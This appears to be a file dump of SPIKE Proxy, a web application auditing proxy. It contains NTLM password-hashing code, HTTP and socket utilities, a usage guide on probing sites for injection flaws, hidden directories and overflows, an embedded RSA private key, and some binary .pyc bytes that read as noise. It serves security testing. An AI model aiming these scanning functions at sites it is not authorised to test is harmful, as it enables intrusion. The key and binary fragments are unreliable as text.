distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # import string import des, md4, utils #--------------------------------------------------------------------- #takes a 21 byte array and treats it as 3 56-bit DES keys. The #8 byte plaintext is encrypted with each key and the resulting 24 #bytes are stored in the result array def calc_resp(keys_str, plain_text): "keys_str - hashed password" "plain_text - nonce from server" res = '' dobj = des.DES(keys_str[0:7]) res = res + dobj.encrypt(plain_text[0:8]) dobj = des.DES(keys_str[7:14]) res = res + dobj.encrypt(plain_text[0:8]) dobj = des.DES(keys_str[14:21]) res = res + dobj.encrypt(plain_text[0:8]) return res #--------------------------------------------------------------------- def create_LM_hashed_password(passwd): "setup LanManager password" "create LanManager hashed password" lm_pw = '\000' * 14 passwd = string.upper(passwd) if len(passwd) < 14: lm_pw = passwd + lm_pw[len(passwd) - 14:] else: lm_pw = passwd[0:14] # do hash magic_lst = [0x4B, 0x47, 0x53, 0x21, 0x40, 0x23, 0x24, 0x25] magic_str = utils.lst2str(magic_lst) res = '' dobj = des.DES(lm_pw[0:7]) res = res + dobj.encrypt(magic_str) dobj = des.DES(lm_pw[7:14]) res = res + dobj.encrypt(magic_str) # addig zeros to get 21 bytes string res = res + '\000\000\000\000\000' return res #--------------------------------------------------------------------- def create_NT_hashed_password(passwd): "create NT hashed password" # we have to have UNICODE password pw = utils.str2unicode(passwd) # do MD4 hash md4_context = md4.new() md4_context.update(pw) res = md4_context.digest() # addig zeros to get 21 bytes string res = res + '\000\000\000\000\000' return res spkproxy/cleanVulnXML.sh0100775000076500007650000000014307556023462014270 0ustar davedaverm -f VulnXML/SiteTests/site* rm -f VulnXML/DirectoryTests/direc* rm -f testVulnXml/* rm -f *.spt spkproxy/SpikeUsage.txt0100664000076500007650000000236407562570177014240 0ustar davedave Spike Proxy Win32 Usage Guide: Unzip the full package into C:\ this should create a folder called "spikeproxy". If you want to unzip it to another drive other than C:\ you will have to edit the runme.bat files within the package. Start SpikeProxy by executing the runme.bat file in C:\spikeproxy\. Check that the directory C:\SPIKEProxy\spkproxy\spikeProxyUI\ is empty. There's a cleanup.bat for this but I prefer a manual check. Now setup your browser to use this as a proxy. (host: 127.0.0.1 port 8080 for HTTP/HTTPS) Now browse through your site you want to test putting things like asdf asdf into User/Password fields and submitting them. Once you have browsed the complete site or files you want to test point your browser to http://spike This is the user interface where you can perform all the actions. Everything else is straight forward. If you have any questions feel free to e-mail me. fr0stman@sun-tzu-security.net Here's a breakdown of the functions: argscan: Scan arguments passed to scripts for injection vulns. dirscan: Scan for common directories and files such as /admin or global.asa overflow: Insert large strings into variables and headers looking for vulns. vulnxml: try whisker/nikto based type attacks against the server. spkproxy/read_query.py0100775000076500007650000000252607667727642014163 0ustar davedave#!/usr/bin/env python """ read_query.py Reads a query from a stored pickled file and displays it This is going to be really slow because the imports do a lot of initializing. Use this as an example if you want to script up somethign that needs to loop or whatever. """ import os import getopt import dircache import cPickle #my imports from spkproxy import header,body from requestandresponse import RequestAndResponse import daveutil import sys def usage(): print "Usage: read_query.py -f file [-r: print request] [-R: print response]" sys.exit(1) try: (opts,args)=getopt.getopt(sys.argv[1:],"f:rR") except getopt.GetoptError: #print help usage() dorequest=0 doresponse=0 target="" for o,a in opts: if o in ["-f"]: target=a if o in ["-r"]: dorequest=1 if o in ["-R"]: doresponse=1 if target=="": usage() clientheader=header() clientbody=body() serverheader=header() serverbody=body() filename=target fd=open(filename) if fd==None: print "Bad Filename: %s"%filename sys.exit(1) obj=cPickle.load(fd) fd.close() if dorequest: print daveutil.constructRequest(obj.clientheader,obj.clientbody) if doresponse: print daveutil.constructResponse(obj.serverheader,obj.serverbody) #DONE spkproxy/server.cert0100664000076500007650000000117307557304564013620 0ustar davedave-----BEGIN CERTIFICATE----- MIIBpzCCARACAQIwDQYJKoZIhvcNAQEEBQAwIDEeMBwGA1UEAxMVQ2VydGlmaWNh dGUgQXV0aG9yaXR5MB4XDTAxMDgxMDA3MjMwNVoXDTAyMDgxMDA3MjMwNVowGDEW MBQGA1UEAxMNU2ltcGxlIFNlcnZlcjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkC gYEAz7ahOfuXgwyZSPvJP1QXgI8NlQMf+1LPd2wtyzrUIjbRI8x8EA0OGGh/tlFh vvi0ZnfjiBdYDMZY/NyILKOA3N/TkZJO2B/fm1XtnIrbwV6siP5RvqSoD4aR2/WW daRTkKEg59n6gYj66VRfKSSgf8Vb+1VX+eLcrDxMgQ9gkVkCAwEAATANBgkqhkiG 9w0BAQQFAAOBgQBHiwd+WB8XQ44n2x7uFK26Wey/QYHbiIvifRcBgKzVBsZmrB2B anac529qlzjBBQcbHic0fUv8V0TcbJ75j7I4QoF/gtUVQbsnvtcbPvtqX3LnHKpX a1o9U7IDv0zBZC8P+JhKQK8Zor8TE8FKJk+td2F5ih4r5B7tNpl3s3J9Mg== -----END CERTIFICATE----- spkproxy/server.pkey0100664000076500007650000000156707557304564013642 0ustar davedave-----BEGIN RSA PRIVATE KEY----- MIICXAIBAAKBgQDPtqE5+5eDDJlI+8k/VBeAjw2VAx/7Us93bC3LOtQiNtEjzHwQ DQ4YaH+2UWG++LRmd+OIF1gMxlj83Igso4Dc39ORkk7YH9+bVe2citvBXqyI/lG+ pKgPhpHb9ZZ1pFOQoSDn2fqBiPrpVF8pJKB/xVv7VVf54tysPEyBD2CRWQIDAQAB AoGAdpvT3tdCwkt8cEeOuIHdVcTaPZ/mME4uOARm9ejm346ryCRpJ4U86kUpwEMi bLl50hVdsQWbetf8Uo/flpXa672aM6Ear3U+8lWj983XraY9jImb/ouHlU5WA7fI RCakcpIfuFSsF1EIhmp2BfOtZlY9x8FN2JbJJJF7o9YCg40CQQDyVBnvoV+Pk0ye Yipr4qAfSAtVrNiBnNLLrgr8VF+hlLj3naF3ic/2tz9ajBmiLeEXUTa/X2/p4Ktx Wgpw4AjvAkEA226W9r2xepb4S1KTbgHo9LmMv5BQcB/JsLjwN3J6RpLqsGm/xvKq 0ZcCFZhBRx2muFtoAMcTEeEr4M1BKU+6NwJAO6vt/w4Tw/0XnuC5ZXuWxl0tPVmk rrX5SmJ/HgeAzP8cVQ0h15e9+BjDpv5cyYzWorFC8/kCS+shDHaJn6XrTQJAdlsn GD1m/j1x/YazuLFVCrMOZMEdcezjZ+vIvc+Efo5+Adt4MoHvew8dc7Jk+0vWAjhj V5AJDCrM9Psg+3xibwJBAJq95xPO+GPnEMWlL72ten0EZENMVmZuXk4sxXKrwb7r pP/BuWWZcpvkldW8MUEW9rMLFp7JXfix0pZYubzncEM= -----END RSA PRIVATE KEY----- spkproxy/versioncheck.py0100664000076500007650000000100307566177721014463 0ustar davedave#!/usr/bin/python #versioncheck is just a simple utility that checks the current version against the version #you have, and prints out whether you have the most current version import urllib URL="http://www.immunitysec.com/SPIKEPROXYVERSION.txt" def getversion(currentversion): try: f = urllib.urlopen(URL) version=f.read() if version!=currentversion: print "You might want to upgrade to a more current version: %s is available!" % version except: return spkproxy/testfunc.py0100664000076500007650000000036407560274253013634 0ustar davedave#yes, list becomes A. :> #yay! I can pass pointers to a function! (heh) def testfunc(some=[]): some.append("A") list=[] testfunc(list) print list #and the for in statement produces order list=["A","B","C","D"] for a in list: print a spkproxy/WHYGPL.txt0100664000076500007650000000302507563350616013200 0ustar davedaveI get asked, not constantly, but often why SPIKE and SPIKE Proxy are open source. Often it's because someone has started using SPIKE Proxy, and doesn't have a lot of experience with the commercial alternatives, but does have experience with other large software projects, and sees some value. Why aren't you making money off that value? They want to know. The answer is not complex - I simply can't afford to compete with commercial solutions in the race to become the best web application auditing tool without being GPL. And I firmly believe that SPIKE Proxy should and will eventually be the best web application auditing tool money can or can't buy. Using the GPL gives me many advantages against commerical projects, and using Python gives me many advantages against even other GPL'd projects. For example, SPIKE Proxy is first-to-market with VulnXML, integrated NTLM support, and many other things that were only possible by integrating other GPL projects into SPIKE Proxy, or getting patches from users, customers, and other interested parties. Python more productive a language than Java (which many competitors are written in), and MUCH more so than C or C++. And it's easy enough to learn that even non-programmers can fiddle with it and send me patches. So enjoy - I know the GUI isn't where it should be, and I'm working on that, but the rest of it is top notch, and getting better every day. Feel free to send me a note if you think it is lacking in any way, or you have any feature suggestions. I'm just happy you're using it. Dave Aitel spkproxy/versioncheck.pyc0100664000076500007650000000117107566177725014640 0ustar davedave- =cs(dkZdZ dZdS(Ns0http://www.immunitysec.com/SPIKEPROXYVERSION.txtcsc  yE tit} |i} ||jod|GHnWndSnXdS(NsEYou might want to upgrade to a more current version: %s is available!(surllibsurlopensURLsfsreadsversionscurrentversion(scurrentversionsversionsf((s./versioncheck.pys getversion s(surllibsURLs getversion(sURLs getversionsurllib((s./versioncheck.pys?s spkproxy/timeoutsocket.py0100775000076500007650000003101507644564476014714 0ustar davedave #### # Copyright 2000,2001 by Timothy O'Malley # # All Rights Reserved # # Permission to use, copy, modify, and distribute this software # and its documentation for any purpose and without fee is hereby # granted, provided that the above copyright notice appear in all # copies and that both that copyright notice and this permission # notice appear in supporting documentation, and that the name of # Timothy O'Malley not be used in advertising or publicity # pertaining to distribution of the software without specific, written # prior permission. # # Timothy O'Malley DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS # SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY # AND FITNESS, IN NO EVENT SHALL Timothy O'Malley BE LIABLE FOR # ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, # WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS # ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR # PERFORMANCE OF THIS SOFTWARE. # #### """Timeout Socket This module enables a timeout mechanism on all TCP connections. It does this by inserting a shim into the socket module. After this module has been imported, all socket creation goes through this shim. As a result, every TCP connection will support a timeout. The beauty of this method is that it immediately and transparently enables the entire python library to support timeouts on TCP sockets. As an example, if you wanted to SMTP connections to have a 20 second timeout: import timeoutsocket import smtplib timeoutsocket.setDefaultSocketTimeout(20) The timeout applies to the socket functions that normally block on execution: read, write, connect, and accept. If any of these operations exceeds the specified timeout, the exception Timeout will be raised. The default timeout value is set to None. As a result, importing this module does not change the default behavior of a socket. The timeout mechanism only activates when the timeout has been set to a numeric value. (This behavior mimics the behavior of the select.select() function.) This module implements two classes: TimeoutSocket and TimeoutFile. The TimeoutSocket class defines a socket-like object that attempts to avoid the condition where a socket may block indefinitely. The TimeoutSocket class raises a Timeout exception whenever the current operation delays too long. The TimeoutFile class defines a file-like object that uses the TimeoutSocket class. When the makefile() method of TimeoutSocket is called, it returns an instance of a TimeoutFile. Each of these objects adds two methods to manage the timeout value: get_timeout() --> returns the timeout of the socket or file set_timeout() --> sets the timeout of the socket or file As an example, one might use the timeout feature to create httplib connections that will timeout after 30 seconds: import timeoutsocket import httplib H = httplib.HTTP("www.python.org") H.sock.set_timeout(30) Note: When used in this manner, the connect() routine may still block because it happens before the timeout is set. To avoid this, use the 'timeoutsocket.setDefaultSocketTimeout()' function. Good Luck! """ __version__ = "$Revision: 1.23 $" __author__ = "Timothy O'Malley " # # Imports # import select, string import socket if not hasattr(socket, "_no_timeoutsocket"): _socket = socket.socket else: _socket = socket._no_timeoutsocket # # Set up constants to test for Connected and Blocking operations. # We delete 'os' and 'errno' to keep our namespace clean(er). # Thanks to Alex Martelli and G. Li for the Windows error codes. # import os if os.name == "nt": _IsConnected = ( 10022, 10056 ) _ConnectBusy = ( 10035, ) _AcceptBusy = ( 10035, ) else: import errno _IsConnected = ( errno.EISCONN, ) _ConnectBusy = ( errno.EINPROGRESS, errno.EALREADY, errno.EWOULDBLOCK ) _AcceptBusy = ( errno.EAGAIN, errno.EWOULDBLOCK ) del errno del os # # Default timeout value for ALL TimeoutSockets # _DefaultTimeout = None def setDefaultSocketTimeout(timeout): global _DefaultTimeout _DefaultTimeout = timeout def getDefaultSocketTimeout(): return _DefaultTimeout # # Exceptions for socket errors and timeouts # Error = socket.error class Timeout(Exception): pass # # Factory function # from socket import AF_INET, SOCK_STREAM def timeoutsocket(family=AF_INET, type=SOCK_STREAM, proto=None): if family != AF_INET or type != SOCK_STREAM: if proto: return _socket(family, type, proto) else: return _socket(family, type) return TimeoutSocket( _socket(family, type), _DefaultTimeout ) # end timeoutsocket # # The TimeoutSocket class definition # class TimeoutSocket: """TimeoutSocket object Implements a socket-like object that raises Timeout whenever an operation takes too long. The definition of 'too long' can be changed using the set_timeout() method. """ _copies = 0 _blocking = 1 def __init__(self, sock, timeout): self._sock = sock self._timeout = timeout # end __init__ def __getattr__(self, key): return getattr(self._sock, key) # end __getattr__ def get_timeout(self): return self._timeout # end set_timeout def set_timeout(self, timeout=None): self._timeout = timeout # end set_timeout def setblocking(self, blocking): self._blocking = blocking return self._sock.setblocking(blocking) # end set_timeout def connect_ex(self, addr): errcode = 0 try: self.connect(addr) except Error, why: errcode = why[0] return errcode # end connect_ex def connect(self, addr, port=None, dumbhack=None): # In case we were called as connect(host, port) if port != None: addr = (addr, port) # Shortcuts sock = self._sock timeout = self._timeout blocking = self._blocking # First, make a non-blocking call to connect try: sock.setblocking(0) sock.connect(addr) sock.setblocking(blocking) return except Error, why: # Set the socket's blocking mode back sock.setblocking(blocking) # If we are not blocking, re-raise if not blocking: raise # If we are already connected, then return success. # If we got a genuine error, re-raise it. errcode = why[0] if dumbhack and errcode in _IsConnected: return elif errcode not in _ConnectBusy: raise # Now, wait for the connect to happen # ONLY if dumbhack indicates this is pass number one. # If select raises an error, we pass it on. # Is this the right behavior? if not dumbhack: r,w,e = select.select([], [sock], [], timeout) if w: return self.connect(addr, dumbhack=1) # If we get here, then we should raise Timeout raise Timeout("Attempted connect to %s timed out." % str(addr) ) # end connect def accept(self, dumbhack=None): # Shortcuts sock = self._sock timeout = self._timeout blocking = self._blocking # First, make a non-blocking call to accept # If we get a valid result, then convert the # accept'ed socket into a TimeoutSocket. # Be carefult about the blocking mode of ourselves. try: sock.setblocking(0) newsock, addr = sock.accept() sock.setblocking(blocking) timeoutnewsock = self.__class__(newsock, timeout) timeoutnewsock.setblocking(blocking) return (timeoutnewsock, addr) except Error, why: # Set the socket's blocking mode back sock.setblocking(blocking) # If we are not supposed to block, then re-raise if not blocking: raise # If we got a genuine error, re-raise it. errcode = why[0] if errcode not in _AcceptBusy: raise # Now, wait for the accept to happen # ONLY if dumbhack indicates this is pass number one. # If select raises an error, we pass it on. # Is this the right behavior? if not dumbhack: r,w,e = select.select([sock], [], [], timeout) if r: return self.accept(dumbhack=1) # If we get here, then we should raise Timeout raise Timeout("Attempted accept timed out.") # end accept def send(self, data, flags=0): sock = self._sock if self._blocking: r,w,e = select.select([],[sock],[], self._timeout) if not w: #no raising for me! return 0 raise Timeout("Send timed out") return sock.send(data, flags) # end send def recv(self, bufsize, flags=0): sock = self._sock if self._blocking: r,w,e = select.select([sock], [], [], self._timeout) if not r: #I don't want to raise anything return "" raise Timeout("Recv timed out") return sock.recv(bufsize, flags) # end recv def makefile(self, flags="r", bufsize=-1): self._copies = self._copies +1 return TimeoutFile(self, flags, bufsize) # end makefile def close(self): if self._copies <= 0: self._sock.close() else: self._copies = self._copies -1 # end close # end TimeoutSocket class TimeoutFile: """TimeoutFile object Implements a file-like object on top of TimeoutSocket. """ def __init__(self, sock, mode="r", bufsize=4096): self._sock = sock self._bufsize = 4096 if bufsize > 0: self._bufsize = bufsize if not hasattr(sock, "_inqueue"): self._sock._inqueue = "" # end __init__ def __getattr__(self, key): return getattr(self._sock, key) # end __getattr__ def close(self): self._sock.close() self._sock = None # end close def write(self, data): self.send(data) # end write def read(self, size=-1): _sock = self._sock _bufsize = self._bufsize while 1: datalen = len(_sock._inqueue) if datalen >= size >= 0: break bufsize = _bufsize if size > 0: bufsize = min(bufsize, size - datalen ) buf = self.recv(bufsize) if not buf: break _sock._inqueue = _sock._inqueue + buf data = _sock._inqueue _sock._inqueue = "" if size > 0 and datalen > size: _sock._inqueue = data[size:] data = data[:size] return data # end read def readline(self, size=-1): _sock = self._sock _bufsize = self._bufsize while 1: idx = string.find(_sock._inqueue, "\n") if idx >= 0: break datalen = len(_sock._inqueue) if datalen >= size >= 0: break bufsize = _bufsize if size > 0: bufsize = min(bufsize, size - datalen ) buf = self.recv(bufsize) if not buf: break _sock._inqueue = _sock._inqueue + buf data = _sock._inqueue _sock._inqueue = "" if idx >= 0: idx = idx + 1 _sock._inqueue = data[idx:] data = data[:idx] elif size > 0 and datalen > size: _sock._inqueue = data[size:] data = data[:size] return data # end readline def readlines(self, sizehint=-1): result = [] data = self.read() while data: idx = string.find(data, "\n") if idx >= 0: idx = idx + 1 result.append( data[:idx] ) data = data[idx:] else: result.append( data ) data = "" return result # end readlines def flush(self): pass # end TimeoutFile # # Silently replace the socket() builtin function with # our timeoutsocket() definition. # if not hasattr(socket, "_no_timeoutsocket"): socket._no_timeoutsocket = socket.socket socket.socket = timeoutsocket del socket socket = timeoutsocket # Finis spkproxy/timeoutsocket.pyc0100664000076500007650000003135207644601326015042 0ustar davedave- >>csdZVXdZYdZ^dkZdkZ_dkZ`eed oaeiZn ceiZkdk Z le i djo+mddfZ ndfZ odfZ nRqdkZreifZ seieieifZ teieifZ u[v[ |ea}d Zd ZeiZd efd YZd klZlZeeedZdfdYZAdfdYZ eed oeie_ee_n[eZdS(sTimeout Socket This module enables a timeout mechanism on all TCP connections. It does this by inserting a shim into the socket module. After this module has been imported, all socket creation goes through this shim. As a result, every TCP connection will support a timeout. The beauty of this method is that it immediately and transparently enables the entire python library to support timeouts on TCP sockets. As an example, if you wanted to SMTP connections to have a 20 second timeout: import timeoutsocket import smtplib timeoutsocket.setDefaultSocketTimeout(20) The timeout applies to the socket functions that normally block on execution: read, write, connect, and accept. If any of these operations exceeds the specified timeout, the exception Timeout will be raised. The default timeout value is set to None. As a result, importing this module does not change the default behavior of a socket. The timeout mechanism only activates when the timeout has been set to a numeric value. (This behavior mimics the behavior of the select.select() function.) This module implements two classes: TimeoutSocket and TimeoutFile. The TimeoutSocket class defines a socket-like object that attempts to avoid the condition where a socket may block indefinitely. The TimeoutSocket class raises a Timeout exception whenever the current operation delays too long. The TimeoutFile class defines a file-like object that uses the TimeoutSocket class. When the makefile() method of TimeoutSocket is called, it returns an instance of a TimeoutFile. Each of these objects adds two methods to manage the timeout value: get_timeout() --> returns the timeout of the socket or file set_timeout() --> sets the timeout of the socket or file As an example, one might use the timeout feature to create httplib connections that will timeout after 30 seconds: import timeoutsocket import httplib H = httplib.HTTP("www.python.org") H.sock.set_timeout(30) Note: When used in this manner, the connect() routine may still block because it happens before the timeout is set. To avoid this, use the 'timeoutsocket.setDefaultSocketTimeout()' function. Good Luck! s$Revision: 1.23 $s$Timothy O'Malley Ns_no_timeoutsocketsnti&'iH'i3'cs}~|adS(N(stimeouts_DefaultTimeout(stimeout((s./timeoutsocket.pyssetDefaultSocketTimeout}scstSdS(N(s_DefaultTimeout(((s./timeoutsocket.pysgetDefaultSocketTimeoutssTimeoutcstZRS(N(s__name__s __module__(((s./timeoutsocket.pysTimeouts (sAF_INETs SOCK_STREAMcsr|tjp |tjo5|ot|||Snt||Sntt||tSdS(N(sfamilysAF_INETstypes SOCK_STREAMsprotos_sockets TimeoutSockets_DefaultTimeout(sfamilystypesproto((s./timeoutsocket.pys timeoutsockets  s TimeoutSocketcstZdZdZdZdZdZdZedZ dZ dZ eed Z ed Z dd Z'dd Z2d ddZ7dZRS(sTimeoutSocket object Implements a socket-like object that raises Timeout whenever an operation takes too long. The definition of 'too long' can be changed using the set_timeout() method. iics||_||_dS(N(ssocksselfs_sockstimeouts_timeout(sselfssockstimeout((s./timeoutsocket.pys__init__s cst|i|SdS(N(sgetattrsselfs_sockskey(sselfskey((s./timeoutsocket.pys __getattr__scs|iSdS(N(sselfs_timeout(sself((s./timeoutsocket.pys get_timeoutscs||_dS(N(stimeoutsselfs_timeout(sselfstimeout((s./timeoutsocket.pys set_timeoutscs&||_|ii|SdS(N(sblockingsselfs _blockings_socks setblocking(sselfsblocking((s./timeoutsocket.pys setblockings csVd}y|i|Wn%tj o}|d}nX|SdS(Ni(serrcodesselfsconnectsaddrsErrorswhy(sselfsaddrswhyserrcode((s./timeoutsocket.pys connect_exs  c s|tjo||f}n|i}|i} |i}y;|i d|i ||i |dSWnt j ow} |i || o n| d}|o |tjo dSn|tjo nnX| oOtig|gg| \} }}|o|i |ddSnntdt|dS(Nisdumbhackis"Attempted connect to %s timed out.(sportsNonesaddrsselfs_sockssocks_timeoutstimeouts _blockingsblockings setblockingsconnectsErrorswhyserrcodesdumbhacks _IsConnecteds _ConnectBusysselectsrswsesTimeoutsstr( sselfsaddrsportsdumbhacksesblockingssockserrcodeswsrstimeoutswhy((s./timeoutsocket.pysconnects0         ' c sf|i}|i} |i}yk|id|i\}}|i||i || } | i|| |fSWndt j oU} |i|| o n | d} |tjo  nnX| oLti|ggg| \} }}| o|iddSnntddS(NisdumbhackisAttempted accept timed out.(sselfs_sockssocks_timeoutstimeouts _blockingsblockings setblockingsacceptsnewsocksaddrs __class__stimeoutnewsocksErrorswhyserrcodes _AcceptBusysdumbhacksselectsrswsesTimeout( sselfsdumbhacksesaddrssockserrcodesblockingswsnewsocksrstimeoutswhystimeoutnewsock((s./timeoutsocket.pysaccepts,       ' cs|i}|ioStig|gg|i\}}} | o"dS#t dnn$|i ||SdS(NisSend timed out( sselfs_sockssocks _blockingsselects_timeoutsrswsesTimeoutssendsdatasflags(sselfsdatasflagssrswssockse((s./timeoutsocket.pyssends  * cs'(|i})|ioS*ti|ggg|i\}}}+| o-dS.t dnn/|i ||SdS(NssRecv timed out( sselfs_sockssocks _blockingsselects_timeoutsrswsesTimeoutsrecvsbufsizesflags(sselfsbufsizesflagssrswsessock((s./timeoutsocket.pysrecv's  * srics-23|id|_4t|||SdS(Ni(sselfs_copiess TimeoutFilesflagssbufsize(sselfsflagssbufsize((s./timeoutsocket.pysmakefile2scsA78|idjo9|iin;|id|_dS(Nii(sselfs_copiess_socksclose(sself((s./timeoutsocket.pysclose7s(s__name__s __module__s__doc__s_copiess _blockings__init__s __getattr__s get_timeoutsNones set_timeouts setblockings connect_exsconnectsacceptssendsrecvsmakefilesclose(((s./timeoutsocket.pys TimeoutSockets       ,+  s TimeoutFilecsAtZdZDFdddZNdZRdZWdZ[ddZqdd Zdd Z d Z RS( sRTimeoutFile object Implements a file-like object on top of TimeoutSocket. sricsfFG||_Hd|_I|djoI||_nJt|d oJd|i_ndS(Niis_inqueues(ssocksselfs_socks_bufsizesbufsizeshasattrs_inqueue(sselfssocksmodesbufsize((s./timeoutsocket.pys__init__Fs   csNOt|i|SdS(N(sgetattrsselfs_sockskey(sselfskey((s./timeoutsocket.pys __getattr__Nscs#RS|iiTt|_dS(N(sselfs_socksclosesNone(sself((s./timeoutsocket.pyscloseRscsWX|i|dS(N(sselfssendsdata(sselfsdata((s./timeoutsocket.pyswriteWsics7[\|i}]|i}^x^do_t|i}`||jo djnoaPnb|}c|djodt|||}ne|i |}f| ogPnh|i||_q!Wi|i}jd|_k|djo ||jo!l|||_m|| }nn|SdS(Niis( sselfs_socks_bufsizeslens_inqueuesdatalenssizesbufsizesminsrecvsbufsdata(sselfssizesdatalensdatas_bufsizesbufsizesbufs_sock((s./timeoutsocket.pysread[s(   !    c sqr|i}s|i}txtdouti|id}v|djowPnxt|i}y||jo djnozPn{|}||djo}t |||}n~|i |}| oPn|i||_q!W|i}d|_|djo.|d}|||_|| }n?|djo ||jo!|||_|| }n|SdS(Nis is(sselfs_socks_bufsizesstringsfinds_inqueuesidxslensdatalenssizesbufsizesminsrecvsbufsdata( sselfssizesidxs_bufsizesdatasdatalensbufsizesbufs_sock((s./timeoutsocket.pysreadlineqs6   !     csg}|i}x|otti|d}|djo2|d}|i|| ||}n|i|d}q!W|SdS(Ns iis(sresultsselfsreadsdatasstringsfindsidxsappend(sselfssizehintsresultsidxsdata((s./timeoutsocket.pys readliness   cs dS(N((sself((s./timeoutsocket.pysflushs( s__name__s __module__s__doc__s__init__s __getattr__scloseswritesreadsreadlines readlinessflush(((s./timeoutsocket.pys TimeoutFileAs   (!s__doc__s __version__s __author__sselectsstringssocketshasattrs_sockets_no_timeoutsocketsossnames _IsConnecteds _ConnectBusys _AcceptBusyserrnosEISCONNs EINPROGRESSsEALREADYs EWOULDBLOCKsEAGAINsNones_DefaultTimeoutssetDefaultSocketTimeoutsgetDefaultSocketTimeoutserrorsErrors ExceptionsTimeoutsAF_INETs SOCK_STREAMs timeoutsockets TimeoutSockets TimeoutFile(s _ConnectBusys TimeoutSockets TimeoutFilesstrings _AcceptBusys timeoutsockets SOCK_STREAMs __author__s _IsConnectedsTimeoutsErrorssocketserrnos_socketsAF_INETssetDefaultSocketTimeoutsselectsgetDefaultSocketTimeouts __version__sos((s./timeoutsocket.pys?Vs@             fspkproxy/daveutil.py~0100775000076500007650000003463207667726365014042 0ustar davedave#daveutil.py import os import random import string import cPickle from htmllib import HTMLParser from formatter import DumbWriter, AbstractFormatter from cStringIO import StringIO #need this for body() import spkproxy #returns data read or "" if none def readuntil(mysocket,mybreakpoint): data="" length=-len(mybreakpoint) #print "length=%d"%length while data[length:]!=mybreakpoint: newdata=mysocket.recv(1) data+=newdata #print "data=%s"%(data[length:]) return data def urlnormalize(url): """ /cow/../../../bob/bob2.php -> /bob/bob2.php """ #for win32 users f=url.replace("\\","/") if f[-1]=="/": tailslash=1 else: tailslash=0 dot=f.split("/") while "." in dot: dot=dot.remove(".") while "" in dot: dot.remove("") while ".." in dot: firstdotdot=dot.index("..") #go one directory up if firstdotdot==0: dot.remove(dot[0]) continue #get rid of parent directory dot.remove(dot[firstdotdot-1]) #do this again to get rid of the .. dot.remove(dot[firstdotdot-1]) fin="/".join(dot)+"/"*tailslash if fin=="": fin="/" if fin[0]!="/": fin="/"+fin return fin #stolen from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/82465 def dmkdir(newdir): """works the way a good mkdir should :) - already exists, silently complete - regular file in the way, raise an exception - parent directory(ies) does not exist, make them as well """ if os.path.isdir(newdir): pass elif os.path.isfile(newdir): raise OSError("a file with the same name as the desired " \ "dir, '%s', already exists." % newdir) else: head, tail = os.path.split(newdir) if head and not os.path.isdir(head): dmkdir(head) #print "_mkdir %s" % repr(newdir) if tail: os.mkdir(newdir) #joins all the spaces in a string def joinallspaces(input): inputold="" inputnew=input[:] while inputold!=inputnew: inputold=inputnew[:] inputnew=inputnew.replace(" "," ") return inputnew def getrandomnumber(): return random.randrange(1,100000,1) def pathjoin(*paths): temp="" for path in paths: #print "Pathjoin "+path if path!="": if path[0]=="/" or path[0]=="\\": #we are windoze compliant! path=path[1:] temp=os.path.join(temp,path) #if the first was an absolute path... if paths[0][0]=="/": temp="/"+temp #add that back return temp def pathsplit(path): temp=path last="tempval" retList=[] while last!="": temp,last=os.path.split(temp) if last!="": retList=[last]+retList return retList #following inits are for prettyprint norm = string.maketrans('', '') #builds list of all characters non_alnum = string.translate(norm, norm, string.letters+string.digits) trans_nontext=string.maketrans(non_alnum,'#'*len(non_alnum)) def prettyprint(data): cleaned=string.translate(data,trans_nontext) return cleaned #openss a requestandresponse object in a file and #obtains the url from the header def getURLfromFile(file): #load our request and response object infile=open(file,"rb") obj=cPickle.load(infile) infile.close() url=obj.clientheader.URL return url #takes a url like /bob/bob2/bob3/asdf.cgi #and returns [bob,bob2,bob3,asdf.cgi] def getDirsFromURL(url): dirList=url.split("/") #check for a file at the last one if dirList[-1].count(".")>0: dirList=dirList[:-1] #now combine them up start="/" realDirList=[] for dir in dirList: start+=dir+"/" start=start.replace("_directory_","") start=start.replace("///","/") start=start.replace("//","/") realDirList.append(start) return realDirList #constructs a request given a header and optionally a body def constructRequest(myheader,mybody=None): #for null value if (mybody==None): mybody=spkproxy.body() #debug if 0: return "GET / HTTP/1.1\r\nHost: www.immunitysec.com\r\nContent-Length: 0\r\n\r\n" request=myheader.verb+" "+myheader.getProxyHeader()+myheader.URL #if we have arguments if myheader.useRawArguments: if len(myheader.allURLargs) > 0: request+="?"+myheader.allURLargs else: if len(myheader.URLargsDict) > 0: request+="?" request+=joinargs(myheader.URLargsDict,orderlist=myheader.orderlist) request+=" "+myheader.version+"\r\n" #ok, the first line is done! #do the rest of the headers that need order #I dunno if any except Host really need ordering, but I do it #to erase any chance of lame bugs later on #plus, python makes it quite easy needOrdered=["Host","User-Agent","Accept","Accept-Language","Accept-Encoding","Accept-Charset","Keep-Alive","Connection","Pragma","Cache-Control"] for avalue in needOrdered: request+=myheader.grabHeader(avalue) #now work on the header pairs we haven't already done for akey in myheader.headerValuesDict.keys(): if akey not in needOrdered: request+=myheader.grabHeader(akey) #ok, headers are all done except for content-length #Content-Length: 0 should always be valid, but it's #not working for some reason on get requests! if mybody.mysize!=0 or myheader.verb!="GET": if not myheader.surpressContentLength(): request+="Content-Length: "+str(len(mybody.data))+"\r\n" #ok, all headers are done, finish with blank line #request+="\r\n" #ok, now add body request+="".join(mybody.data) #done! return request #takes in a dict, returls A=B&C=D,etc def joinargs(argdict,orderlist=[]): first=1 result="" donelist=[] for akey in orderlist: donelist.append(akey) if not first: result+="&" first=0 result+=akey+"="+argdict[akey] for akey in argdict.keys(): if akey in donelist: continue if not first: result+="&" first=0 result+=akey+"="+argdict[akey] return result #returns None on error #returns a dictionary of a string split like a normal HTTP argument list def splitargs(argstring,orderlist=[]): 